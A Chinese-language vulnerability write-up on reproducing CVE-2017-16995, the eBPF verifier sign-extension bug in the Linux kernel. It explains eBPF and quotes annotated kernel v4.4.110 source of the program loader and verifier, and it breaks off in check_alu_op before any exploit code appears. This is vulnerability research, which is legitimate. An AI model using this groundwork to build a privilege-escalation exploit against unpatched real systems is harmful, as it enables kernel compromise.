CVE-2017-16995复现

对eBPF模块中由于s32到u64的符号扩展问题导致的漏洞CVE-2017-16995的复现。

CVE-2017-16995最初是由Google project zero披露,并公开了相关poc,在2017年12月23日,Bruce Leidl公布了提权代码。在2018年3月中旬,Vitaly Nikolenko在推特上发布消息说Ubuntu 16.04存在高危漏洞,可以进行本地提权,同时公布了exp。整个过程仅利用精心构造的数据就可以劫持控制流,是属于Data-Oriented Attacks在Linux kernel上的一个典型应用。

eBPF模块

eBPF源于最早在BSD上成型的技术BPF(Berkeley Packet Filter),BPF是一个用于过滤网络报文(Packet)的架构,常用的抓包软件tcpdump,wireshark都基于这个模块对用户提供抓包接口。BPF根据规则过滤报文,将符合条件的报文由内核空间复制到用户空间。eBPF是基于原有的BPF,重新设计了一个新的BPF模块,在Linux 3.17加入到kernel/bpf中,新的BPF被命名为extended BPF,简称eBPF。eBPF提供了一个内核与用户进行代码和数据传输的桥梁,用户可以使用eBPF指令字节码的形式编写代码并传入内核,通过相关事件触发内核执行用户传入的代码。可以注入代码必然存在安全隐患,eBPF制定了复杂的verifier机制,在运行用户代码之前,先要进行一系列的安全检查,采用模拟执行的方式进行检查,最大程度地防止eBPF代码在真实执行时发生攻击。

eBPF sample

Linux内核代码的samples/bpf目录下有bpf的使用示例,以一个简单的sample来说明一个eBPF过滤代码的编写过程。因为后续调试内核版本是v4.4.110,所以源码版本是v4.4.110。示例代码如下,整个过程分为三部分。这里涉及到的bpf_create_map,bpf_prog_load都是samples中自定义的函数,仅在samples中调用,利用系统调用syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr))和syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr))实现。后面给出的bpf_create_map是samples中libbpf.c里的封装函数,而后面给出的bpf_prog_load则是内核(kernel/bpf/syscall.c)中真正处理BPF_PROG_LOAD的函数源码。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
//https://elixir.bootlin.com/linux/v4.4.110/source/samples/bpf/sock_example.c
/*
 * Sample from samples/bpf/sock_example.c. Creates an array map, loads a
 * small eBPF socket filter that bumps a per-IP-protocol counter in that map,
 * attaches the filter to the socket returned by open_raw_sock("lo"), and
 * prints the TCP/UDP/ICMP counters once a second for ten iterations.
 * Always returns 0; failures are only reported through printf().
 */
static int test_sock(void)
{
int sock = -1, map_fd, prog_fd, i, key;
long long value = 0, tcp_cnt, udp_cnt, icmp_cnt;

map_fd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(key), sizeof(value), 256); // step 1: create an array map with 256 entries
if (map_fd < 0) {
printf("failed to create map '%s'\n", strerror(errno));
goto cleanup;
}

// step 2: the hand-written eBPF program (key = ip->protocol, value += 1)
struct bpf_insn prog[] = {
BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),
BPF_LD_ABS(BPF_B, ETH_HLEN + offsetof(struct iphdr, protocol) /* R0 = ip->proto */),
BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4), /* *(u32 *)(fp - 4) = r0 */
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), /* r2 = fp - 4 */
BPF_LD_MAP_FD(BPF_REG_1, map_fd),
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem),
BPF_JMP_IMM(BPF_JEQ, BPF_REG_0, 0, 2),
BPF_MOV64_IMM(BPF_REG_1, 1), /* r1 = 1 */
BPF_RAW_INSN(BPF_STX | BPF_XADD | BPF_DW, BPF_REG_0, BPF_REG_1, 0, 0), /* xadd r0 += r1 */
BPF_MOV64_IMM(BPF_REG_0, 0), /* r0 = 0 */
BPF_EXIT_INSN(),
};

// load the eBPF program into the kernel (this is where it gets verified)
prog_fd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, prog, sizeof(prog),
"GPL", 0);
if (prog_fd < 0) {
printf("failed to load prog '%s'\n", strerror(errno));
goto cleanup;
}

// NOTE(review): the return value of open_raw_sock() is not checked here
sock = open_raw_sock("lo");

// step 3: attach the loaded eBPF program to the socket
if (setsockopt(sock, SOL_SOCKET, SO_ATTACH_BPF, &prog_fd,
sizeof(prog_fd)) < 0) {
printf("setsockopt %s\n", strerror(errno));
goto cleanup;
}

// From here on the attached filter is executed for real (not simulated);
// this loop only reads the three counters back from the map once a second.
for (i = 0; i < 10; i++) {
key = IPPROTO_TCP;
assert(bpf_lookup_elem(map_fd, &key, &tcp_cnt) == 0);

key = IPPROTO_UDP;
assert(bpf_lookup_elem(map_fd, &key, &udp_cnt) == 0);

key = IPPROTO_ICMP;
assert(bpf_lookup_elem(map_fd, &key, &icmp_cnt) == 0);

printf("TCP %lld UDP %lld ICMP %lld packets\n",
tcp_cnt, udp_cnt, icmp_cnt);
sleep(1);
}

cleanup:
/* maps, programs, raw sockets will auto cleanup on process exit */
return 0;
}

1.首先调用bpf_create_map创建一个map,在attr结构体中指定map的类型、key和value的大小、最大容量,函数返回一个map_fd描述符。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
//https://elixir.bootlin.com/linux/v4.4.110/source/samples/bpf/libbpf.c#L21
/*
 * User-space helper from samples/bpf/libbpf.c: fills a zeroed union bpf_attr
 * with the map type, key size, value size and maximum number of entries, and
 * issues the BPF_MAP_CREATE command through sys_bpf().
 * Returns whatever sys_bpf() returns; test_sock() in this article treats a
 * negative result as failure and otherwise uses it as the map descriptor.
 */
int bpf_create_map(enum bpf_map_type map_type, int key_size,
int value_size, int max_entries)
{
union bpf_attr attr;

/* zero the whole union so every field not set below is 0 */
memset(&attr, '\0', sizeof(attr));

attr.map_type = map_type;
attr.key_size = key_size;
attr.value_size = value_size;
attr.max_entries = max_entries;

return sys_bpf(BPF_MAP_CREATE, &attr, sizeof(attr));
}

2.调用bpf_prog_load将用户编写的eBPF代码prog加载至内核,attr结构体包含了指令的类型,指令首地址,指令长度,日志大小,日志级别等,然后会进行一系列检查,检查核心在于bpf_check函数,采用模拟执行的方式进行检查。这个下文中会有分析。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
//https://elixir.bootlin.com/linux/v4.4.110/source/kernel/bpf/syscall.c#L621
/*
 * Kernel-side handler for BPF_PROG_LOAD. Validates the attributes, copies
 * the license string and the instructions from user space into a freshly
 * allocated struct bpf_prog, runs the verifier (bpf_check), fixes up call
 * instructions, selects the runtime and finally returns the result of
 * bpf_prog_new_fd(). Returns a negative errno on any failure; the labels at
 * the bottom undo the steps taken so far in reverse order.
 */
static int bpf_prog_load(union bpf_attr *attr)
{
enum bpf_prog_type type = attr->prog_type;
struct bpf_prog *prog;
int err;
char license[128];
bool is_gpl;

// sanity-check the attr passed in from user space (CHECK_ATTR is defined elsewhere)
if (CHECK_ATTR(BPF_PROG_LOAD))
return -EINVAL;

/* copy eBPF program license from user space */
// at most sizeof(license) - 1 bytes are copied; the last byte is forced to 0 below
if (strncpy_from_user(license, u64_to_ptr(attr->license),
sizeof(license) - 1) < 0)
return -EFAULT;
license[sizeof(license) - 1] = 0;

/* eBPF programs must be GPL compatible to use GPL-ed functions */
// remember whether the supplied license string is GPL compatible
is_gpl = license_is_gpl_compatible(license);

// reject programs whose instruction count is >= BPF_MAXINSNS (4096 according to the article)
if (attr->insn_cnt >= BPF_MAXINSNS)
return -EINVAL;

// kprobe programs must state the version code of the running kernel
if (type == BPF_PROG_TYPE_KPROBE &&
attr->kern_version != LINUX_VERSION_CODE)
return -EINVAL;

// every program type except a socket filter requires CAP_SYS_ADMIN
if (type != BPF_PROG_TYPE_SOCKET_FILTER && !capable(CAP_SYS_ADMIN))
return -EPERM;

/* plain bpf_prog allocation */
// allocate the bpf_prog structure that will hold the user's instructions and related state
prog = bpf_prog_alloc(bpf_prog_size(attr->insn_cnt), GFP_USER);
if (!prog)
return -ENOMEM;


err = bpf_prog_charge_memlock(prog);
if (err)
goto free_prog_nouncharge;

prog->len = attr->insn_cnt;

err = -EFAULT;
// copy the eBPF instructions from user space into prog->insns
if (copy_from_user(prog->insns, u64_to_ptr(attr->insns),
prog->len * sizeof(struct bpf_insn)) != 0)
goto free_prog;

prog->orig_prog = NULL;
prog->jited = 0;

atomic_set(&prog->aux->refcnt, 1);
prog->gpl_compatible = is_gpl ? 1 : 0;

/* find program type: socket_filter vs tracing_filter */
// resolve the program type requested by the caller
err = find_prog_type(type, prog);
if (err < 0)
goto free_prog;

/* run eBPF verifier */
// the verifier may replace prog, hence the pointer-to-pointer argument
err = bpf_check(&prog, attr);
if (err < 0)
goto free_used_maps;

/* fixup BPF_CALL->imm field */
// rewrites the imm of call instructions (fixup_bpf_calls is defined elsewhere)
fixup_bpf_calls(prog);

/* eBPF program is ready to be JITed */
// choose how the program will be run
err = bpf_prog_select_runtime(prog);
if (err < 0)
goto free_used_maps;

err = bpf_prog_new_fd(prog);
if (err < 0)
/* failed to allocate fd */
goto free_used_maps;

// on success err holds the value returned by bpf_prog_new_fd()
return err;

free_used_maps:
free_used_maps(prog->aux);
free_prog:
bpf_prog_uncharge_memlock(prog);
free_prog_nouncharge:
bpf_prog_free(prog);
return err;
}

3.用户调用setsockopt(sock, SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd))将用户自定义的eBPF代码绑定到指定的socket上,此时代码已经拷贝至内核,由prog_fd指向的bpf_prog结构体维护。成功绑定后,对socket数据包执行eBPF代码,此时为真实执行。

eBPF指令集

eBPF指令集与我们常见的汇编指令有所不同,它拥有R0~R10共11个虚拟寄存器,它有一个栈,使用map结构与用户进行交互,前文中也提到调用bpf_create_map创建一个map。在x86_64下,R0~R10与CPU中的11个物理寄存器对应如下:

1
2
3
4
5
6
7
8
9
10
11
R0 -- RAX
R1 -- RDI
R2 -- RSI
R3 -- RDX
R4 -- RCX
R5 -- R8
R6 -- RBX
R7 -- R13
R8 -- R14
R9 -- R15
R10 -- RBP

每条指令对应的数据结构如下,在示例中prog的类型就是struct bpf_insn:

1
2
3
4
5
6
7
8
//https://elixir.bootlin.com/linux/v4.4.110/source/include/uapi/linux/bpf.h#L58
/* One eBPF instruction; the article notes each instruction is 8 bytes long. */
struct bpf_insn {
__u8 code; /* opcode */ // low three bits select the instruction class (see BPF_CLASS)
__u8 dst_reg:4; /* dest register */ // 4-bit destination register number
__u8 src_reg:4; /* source register */ // 4-bit source register number
__s16 off; /* signed offset */ // signed 16-bit offset (jump displacement or memory offset)
__s32 imm; /* signed immediate constant */ // signed 32-bit immediate operand
};

eBPF的操作码一共有8大类,一个code有8个bit,code的低三位代表了指令的类型:

1
2
3
4
5
6
7
8
9
10
11
//https://elixir.bootlin.com/linux/v4.4.110/source/include/uapi/linux/bpf_common.h#L6
/* Instruction classes */
// BPF_CLASS() extracts the low three bits of the opcode byte
#define BPF_CLASS(code) ((code) & 0x07)
#define BPF_LD 0x00
#define BPF_LDX 0x01 // load instructions
#define BPF_ST 0x02
#define BPF_STX 0x03 // store instructions
#define BPF_ALU 0x04 // arithmetic/logic instructions
#define BPF_JMP 0x05 // jump instructions
#define BPF_RET 0x06 // return instructions
#define BPF_MISC 0x07 // miscellaneous; the decoder script later in this article uses 0x07 as BPF_ALU64

eBPF verifier机制

检查机制核心在于bpf_check函数,一共有两次check,首轮检查的关键函数是check_cfg,对代码进行有向无环图检测,检查代码中是否有循环,以及跳转指令是否跳转到未知位置,第二轮检查由do_check实现。在进行两轮check之前,先执行了replace_map_fd_with_map_ptr函数,首先看一下这个函数,然后再看一下模拟执行的检查。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
//https://elixir.bootlin.com/linux/v4.4.110/source/kernel/bpf/verifier.c#L2214
/*
 * Entry point of the eBPF verifier. After setting up a verifier_env and the
 * optional user-visible log, it runs replace_map_fd_with_map_ptr(), then
 * check_cfg(), then do_check(). On success it converts context accesses,
 * records the maps used by the program and converts the pseudo ld_imm64
 * instructions. Returns 0 on success or a negative errno; *prog is written
 * back from env->prog before returning.
 */
int bpf_check(struct bpf_prog **prog, union bpf_attr *attr)
{
char __user *log_ubuf = NULL;
struct verifier_env *env;
int ret = -EINVAL;

// reject programs whose length is <= 0 or greater than BPF_MAXINSNS
if ((*prog)->len <= 0 || (*prog)->len > BPF_MAXINSNS)
return -E2BIG;

/* 'struct verifier_env' can be global, but since it's not small,
* allocate/free it every time bpf_check() is called
*/
env = kzalloc(sizeof(struct verifier_env), GFP_KERNEL);
if (!env)
return -ENOMEM;

env->prog = *prog;

/* grab the mutex to protect few globals used by verifier */
mutex_lock(&bpf_verifier_lock);

// pick up the log-related parameters from attr; the log is optional
if (attr->log_level || attr->log_buf || attr->log_size) {
/* user requested verbose verifier output
* and supplied buffer to store the verification trace
*/
log_level = attr->log_level;
log_ubuf = (char __user *) (unsigned long) attr->log_buf;
log_size = attr->log_size;
log_len = 0;

ret = -EINVAL;
/* log_* values have to be sane */
if (log_size < 128 || log_size > UINT_MAX >> 8 ||
log_level == 0 || log_ubuf == NULL)
goto free_env;

ret = -ENOMEM;
log_buf = vmalloc(log_size);
if (!log_buf)
goto free_env;
} else {
log_level = 0;
}


// runs before both checking passes; analysed in the next section of the article
ret = replace_map_fd_with_map_ptr(env); //here
if (ret < 0)
goto skip_full_check;

env->explored_states = kcalloc(env->prog->len,
sizeof(struct verifier_state_list *),
GFP_USER);
ret = -ENOMEM;
if (!env->explored_states)
goto skip_full_check;

// first pass: per the article, rejects loops and jumps to invalid targets
ret = check_cfg(env);
if (ret < 0)
goto skip_full_check;

env->allow_ptr_leaks = capable(CAP_SYS_ADMIN);

// second pass: detailed check by simulated execution
ret = do_check(env);

skip_full_check:
// drain any branch states still pending on the verifier stack
while (pop_stack(env, NULL) >= 0);
free_states(env);

if (ret == 0)
/* program is valid, convert *(u32*)(ctx + off) accesses */
ret = convert_ctx_accesses(env);

if (log_level && log_len >= log_size - 1) {
BUG_ON(log_len >= log_size);
/* verifier log exceeded user supplied buffer */
ret = -ENOSPC;
/* fall through to return what was recorded */
}

/* copy verifier log back to user space including trailing zero */
if (log_level && copy_to_user(log_ubuf, log_buf, log_len + 1) != 0) {
ret = -EFAULT;
goto free_log_buf;
}

if (ret == 0 && env->used_map_cnt) {
/* if program passed verifier, update used_maps in bpf_prog_info */
env->prog->aux->used_maps = kmalloc_array(env->used_map_cnt,
sizeof(env->used_maps[0]),
GFP_KERNEL);

if (!env->prog->aux->used_maps) {
ret = -ENOMEM;
goto free_log_buf;
}

memcpy(env->prog->aux->used_maps, env->used_maps,
sizeof(env->used_maps[0]) * env->used_map_cnt);
env->prog->aux->used_map_cnt = env->used_map_cnt;

/* program is valid. Convert pseudo bpf_ld_imm64 into generic
* bpf_ld_imm64 instructions
*/
convert_pseudo_ld_imm64(env);
}

free_log_buf:
if (log_level)
vfree(log_buf);
free_env:
if (!env->prog->aux->used_maps)
/* if we didn't copy map pointers into bpf_prog_info, release
* them now. Otherwise free_bpf_prog_info() will release them.
*/
release_maps(env);
*prog = env->prog;
kfree(env);
mutex_unlock(&bpf_verifier_lock);
return ret;
}

replace_map_fd_with_map_ptr

当指令的code为BPF_LD | BPF_IMM | BPF_DW、源寄存器字段src_reg为1(BPF_PSEUDO_MAP_FD),且下一条指令的code、dst_reg、src_reg、off均为0时(下一条指令的imm不做检查),该函数会对这条指令以及它的下一条指令进行imm替换:首先把该指令的imm当作bpf_map的fd,根据fd获取bpf_map的地址,然后将该指令的imm替换为map地址的低32位,高32位赋值给下一条指令的imm。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
//https://elixir.bootlin.com/linux/v4.4.110/source/kernel/bpf/verifier.c#L1990
/*
 * Walks every instruction of env->prog. It rejects BPF_LDX/BPF_STX
 * instructions that use reserved fields, and for each two-slot
 * BPF_LD | BPF_IMM | BPF_DW instruction whose src_reg is BPF_PSEUDO_MAP_FD
 * it replaces the map fd stored in imm with the kernel address of the
 * struct bpf_map (low 32 bits in the first slot, high 32 bits in the second).
 * Each distinct map is recorded once in env->used_maps.
 * Returns 0 on success or a negative errno.
 */
static int replace_map_fd_with_map_ptr(struct verifier_env *env)
{
struct bpf_insn *insn = env->prog->insnsi;
int insn_cnt = env->prog->len;
int i, j;

// iterate over all eBPF instructions
for (i = 0; i < insn_cnt; i++, insn++) {
if (BPF_CLASS(insn->code) == BPF_LDX &&
(BPF_MODE(insn->code) != BPF_MEM || insn->imm != 0)) {
verbose("BPF_LDX uses reserved fields\n");
return -EINVAL;
}

if (BPF_CLASS(insn->code) == BPF_STX &&
((BPF_MODE(insn->code) != BPF_MEM &&
BPF_MODE(insn->code) != BPF_XADD) || insn->imm != 0)) {
verbose("BPF_STX uses reserved fields\n");
return -EINVAL;
}

// instruction is a 64-bit immediate load: BPF_LD | BPF_IMM | BPF_DW
if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) {
struct bpf_map *map;
struct fd f;
// a second slot must exist, and its code, dst_reg, src_reg and off must
// all be 0; its imm is not checked here
if (i == insn_cnt - 1 || insn[1].code != 0 ||
insn[1].dst_reg != 0 || insn[1].src_reg != 0 ||
insn[1].off != 0) {
verbose("invalid bpf_ld_imm64 insn\n");
return -EINVAL;
}

if (insn->src_reg == 0)
/* valid generic load 64-bit imm */
goto next_insn;

// otherwise src_reg must be BPF_PSEUDO_MAP_FD (value 1, per the decoder script in this article)
if (insn->src_reg != BPF_PSEUDO_MAP_FD) {
verbose("unrecognized bpf_ld_imm64 insn\n");
return -EINVAL;
}

f = fdget(insn->imm); // the immediate is interpreted as a map fd
map = __bpf_map_get(f); // resolve the fd to its struct bpf_map
if (IS_ERR(map)) {
verbose("fd %d is not pointing to valid bpf_map\n",
insn->imm);
return PTR_ERR(map);
}

/* store map pointer inside BPF_LD_IMM64 instruction */
insn[0].imm = (u32) (unsigned long) map; // first slot gets the low 32 bits of the map address
insn[1].imm = ((u64) (unsigned long) map) >> 32; // second slot gets the high 32 bits

/* check whether we recorded this map already */
for (j = 0; j < env->used_map_cnt; j++)
if (env->used_maps[j] == map) {
fdput(f);
goto next_insn;
}

if (env->used_map_cnt >= MAX_USED_MAPS) {
fdput(f);
return -E2BIG;
}

/* hold the map. If the program is rejected by verifier,
* the map will be released by release_maps() or it
* will be used by the valid program until it's unloaded
* and all maps are released in free_bpf_prog_info()
*/
map = bpf_map_inc(map, false);
if (IS_ERR(map)) {
fdput(f);
return PTR_ERR(map);
}
env->used_maps[env->used_map_cnt++] = map;

fdput(f);
next_insn:
// skip the second slot of the two-slot instruction
insn++;
i++;
}
}

/* now all pseudo BPF_LD_IMM64 instructions load valid
* 'struct bpf_map *' into a register instead of user map_fd.
* These pointers will be used later by verifier to validate map access.
*/
return 0;
}

关于检查机制,这里主要看一下与漏洞相关的do_check的检查逻辑。

do_check

寄存器初始化

首先初始化寄存器的状态,寄存器状态由结构体reg_state定义,它由一个枚举成员和一个联合体组成,枚举bpf_reg_type定义了寄存器中存储的值的类型,包括未初始化、指针、常量等。联合体中的imm只有在寄存器类型为CONST_IMM或PTR_TO_STACK时才有效。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
//https://elixir.bootlin.com/linux/v4.4.110/source/kernel/bpf/verifier.c#L129
/* Verifier's view of one register: a type tag plus type-dependent data. */
struct reg_state {
enum bpf_reg_type type;
union {
/* valid when type == CONST_IMM | PTR_TO_STACK */
int imm; // note: the tracked immediate is a plain signed int

/* valid when type == CONST_PTR_TO_MAP | PTR_TO_MAP_VALUE |
* PTR_TO_MAP_VALUE_OR_NULL
*/
struct bpf_map *map_ptr;
};
};

/* Kinds of value the verifier tracks for a register (reg_state.type). */
enum bpf_reg_type {
NOT_INIT = 0, /* nothing was written into register */
UNKNOWN_VALUE, /* reg doesn't contain a valid pointer */
PTR_TO_CTX, /* reg points to bpf_context */
CONST_PTR_TO_MAP, /* reg points to struct bpf_map */
PTR_TO_MAP_VALUE, /* reg points to map element value */
PTR_TO_MAP_VALUE_OR_NULL,/* points to map elem value or NULL */
FRAME_PTR, /* reg == frame_pointer */
PTR_TO_STACK, /* reg == frame_pointer + imm */
CONST_IMM, /* constant integer value */
};

init_reg_state函数初始化寄存器的状态,将所有寄存器的类型初始化为NOT_INIT,然后把R10(BPF_REG_FP)的type设置为帧指针FRAME_PTR,R1的类型设置为指向bpf_context的指针PTR_TO_CTX。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
//https://elixir.bootlin.com/linux/v4.4.110/source/kernel/bpf/verifier.c#L474
/*
 * Resets the verifier's register file: every register becomes NOT_INIT with
 * cleared data, then the frame-pointer register is typed FRAME_PTR and R1 is
 * typed PTR_TO_CTX.
 */
static void init_reg_state(struct reg_state *regs)
{
int i;


for (i = 0; i < MAX_BPF_REG; i++) {
regs[i].type = NOT_INIT;
/* imm and map_ptr are members of the same union in struct reg_state */
regs[i].imm = 0;
regs[i].map_ptr = NULL;
}

/* frame pointer */
regs[BPF_REG_FP].type = FRAME_PTR;

/* 1st arg to a function */
regs[BPF_REG_1].type = PTR_TO_CTX;
}

指令都存储在insns数组中,根据下标insn_idx的数值来获取每一条指令,检查的核心在for定义的无限循环中,insn_processed记录for循环执行的次数,最多执行32768次。首先获取指令的类型class,前面提到有8大类型,根据不同的指令类型有不同的处理方式。由于代码比较长,这里只关注与本漏洞相关的指令类型中的检查逻辑。首先看这几个check中用到的函数。

检查中的常用函数

check_reg_arg

首先是当寄存器作为操作数时,对寄存器进行检查的check_reg_arg函数,根据寄存器在指令中所处的位置(源操作数/目的操作数)分别对其type进行检查,当为读指令时,检查源操作数是否为可读;指令为写指令时,检查目的操作数是否可写。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
//https://elixir.bootlin.com/linux/v4.4.110/source/kernel/bpf/verifier.c#L505
/*
 * Validates the use of register regno as an instruction operand.
 * With t == SRC_OP the register must have been initialised. With any other t
 * it must not be the frame pointer, and with t == DST_OP its tracked state
 * is additionally reset through mark_reg_unknown_value().
 * Returns 0 if the use is allowed, -EINVAL for an out-of-range register
 * number, -EACCES otherwise.
 */
static int check_reg_arg(struct reg_state *regs, u32 regno,
enum reg_arg_type t)
{
// register numbers at or beyond MAX_BPF_REG do not exist
if (regno >= MAX_BPF_REG) {
verbose("R%d is invalid\n", regno);
return -EINVAL;
}

// used as a source operand: anything but an uninitialised register may be read
if (t == SRC_OP) {
/* check whether register used as source operand can be read */
if (regs[regno].type == NOT_INIT) {
verbose("R%d !read_ok\n", regno);
return -EACCES;
}
}

// used as a destination operand: the frame pointer is read-only
else {
/* check whether register used as dest operand can be written to */
if (regno == BPF_REG_FP) {
verbose("frame pointer is read only\n");
return -EACCES;
}
if (t == DST_OP)
mark_reg_unknown_value(regs, regno); // resets the tracked state (per the article: type UNKNOWN_VALUE, map_ptr cleared)
}
return 0;
}

check_mem_access

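regno是保存访存基地址的寄存器,t是访问类型read/write,value_regno是存放被读出/待写入数值的寄存器。当指令对memory进行读写操作时,根据regno寄存器的类型分别进行不同的检查,中心思想是off不能超过memory的size范围,即不能越界。当指令向map或ctx写入时,value_regno寄存器中的值不能是指针(is_pointer_value为真时报"leaks addr"并拒绝),即不允许把内核地址泄露到map或ctx中;当指令从map或ctx读取时,value_regno寄存器的类型置为UNKNOWN_VALUE。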

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
//https://elixir.bootlin.com/linux/v4.4.110/source/kernel/bpf/verifier.c#L683
/*
 * Verifier check for one memory access of bpf_size bytes at offset off from
 * the address held in register regno. t says whether it is a read or a
 * write; value_regno is the register whose value is stored or that receives
 * the loaded value (the value_regno >= 0 tests skip the register handling
 * when it is negative). Returns 0 if the access is allowed, a negative errno
 * otherwise.
 */
static int check_mem_access(struct verifier_env *env, u32 regno, int off,
int bpf_size, enum bpf_access_type t,
int value_regno)
{
struct verifier_state *state = &env->cur_state;
int size, err = 0;

// base register is a stack pointer (frame_pointer + imm): fold imm into the offset
if (state->regs[regno].type == PTR_TO_STACK)
off += state->regs[regno].imm;

size = bpf_size_to_bytes(bpf_size);
if (size < 0)
return size;

// the offset must be a multiple of the access size
if (off % size != 0) {
verbose("misaligned access off %d size %d\n", off, size);
return -EACCES;
}

// base register points to a map element value
if (state->regs[regno].type == PTR_TO_MAP_VALUE) {
// writing into the map: reject if the value register holds a pointer,
// since that would leak an address into the map
if (t == BPF_WRITE && value_regno >= 0 &&
is_pointer_value(env, value_regno)) {
verbose("R%d leaks addr into map\n", value_regno);
return -EACCES;
}
err = check_map_access(env, regno, off, size); // bounds check of off/size against the map (helper defined elsewhere)
if (!err && t == BPF_READ && value_regno >= 0)
mark_reg_unknown_value(state->regs, value_regno);

}

// base register points to bpf_context
else if (state->regs[regno].type == PTR_TO_CTX) {
// writing into the context: reject if the value register holds a pointer
if (t == BPF_WRITE && value_regno >= 0 &&
is_pointer_value(env, value_regno)) {
verbose("R%d leaks addr into ctx\n", value_regno);
return -EACCES;
}
err = check_ctx_access(env, off, size, t);
if (!err && t == BPF_READ && value_regno >= 0)
mark_reg_unknown_value(state->regs, value_regno);

}

// base register points into the stack: off must lie in [-MAX_BPF_STACK, 0);
// the actual read/write checks are delegated to check_stack_read/check_stack_write
else if (state->regs[regno].type == FRAME_PTR ||
state->regs[regno].type == PTR_TO_STACK) {
if (off >= 0 || off < -MAX_BPF_STACK) {
verbose("invalid stack off=%d size=%d\n", off, size);
return -EACCES;
}
if (t == BPF_WRITE) {
// unless pointer leaks are allowed, a write that is not full register
// size may not touch a slot marked STACK_SPILL
if (!env->allow_ptr_leaks &&
state->stack_slot_type[MAX_BPF_STACK + off] == STACK_SPILL &&
size != BPF_REG_SIZE) {
verbose("attempt to corrupt spilled pointer on stack\n");
return -EACCES;
}
err = check_stack_write(state, off, size, value_regno);
} else {
err = check_stack_read(state, off, size, value_regno);
}
} else {
// any other register type cannot be used as a memory base
verbose("R%d invalid mem access '%s'\n",
regno, reg_type_str[state->regs[regno].type]);
return -EACCES;
}
return err;
}

在for循环中对于每一类指令几乎都用到check_reg_arg函数,对内存读写指令会调用check_mem_access函数进行检查。

BPF_ALU中的BPF_MOV

for循环中首先检查类型为BPF_ALU中的指令,我们常用的MOV指令在此类指令中,类型为BPF_MOV,当指令为BPF_ALU时,调用check_alu_op函数进行检查,check_alu_op函数会根据指令的小类型比如BPF_MOV,BPF_ADD等类型分别进行处理,这里关注小类型为BPF_MOV的情况,函数会调用check_reg_arg对源操作数和目的操作数进行检查,如果源操作数是寄存器时,会直接将源寄存器的reg_state复制到目的寄存器中;如果源操作数是立即数,会将insn->imm复制到目的寄存器的imm中,insn->imm和reg_state的imm类型都是int类型,然后目的寄存器的类型设置为CONST_IMM.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
/* check validity of 32-bit and 64-bit arithmetic operations */
/*
 * Verifier check for one ALU instruction. Only the BPF_MOV case is quoted in
 * full here; the "... ..." lines are parts the article's author left out.
 * For BPF_MOV it validates the reserved fields and both operands, then
 * updates the tracked state of the destination register.
 * Returns 0 on success or a negative errno.
 */
static int check_alu_op(struct verifier_env *env, struct bpf_insn *insn)
{
struct reg_state *regs = env->cur_state.regs;
u8 opcode = BPF_OP(insn->code);
int err;

if (opcode == BPF_END || opcode == BPF_NEG) {
... ...

} else if (opcode == BPF_MOV) {

// register source (BPF_X): imm and off are reserved and must be 0
if (BPF_SRC(insn->code) == BPF_X) {
if (insn->imm != 0 || insn->off != 0) {
verbose("BPF_MOV uses reserved fields\n");
return -EINVAL;
}

/* check src operand */
err = check_reg_arg(regs, insn->src_reg, SRC_OP);
if (err)
return err;
} else {
// immediate source: src_reg and off are reserved and must be 0
if (insn->src_reg != BPF_REG_0 || insn->off != 0) {
verbose("BPF_MOV uses reserved fields\n");
return -EINVAL;
}
}

/* check dest operand */
err = check_reg_arg(regs, insn->dst_reg, DST_OP);
if (err)
return err;

// source is a register
if (BPF_SRC(insn->code) == BPF_X) {
if (BPF_CLASS(insn->code) == BPF_ALU64) {
/* case: R1 = R2
* copy register state to dest reg
*/
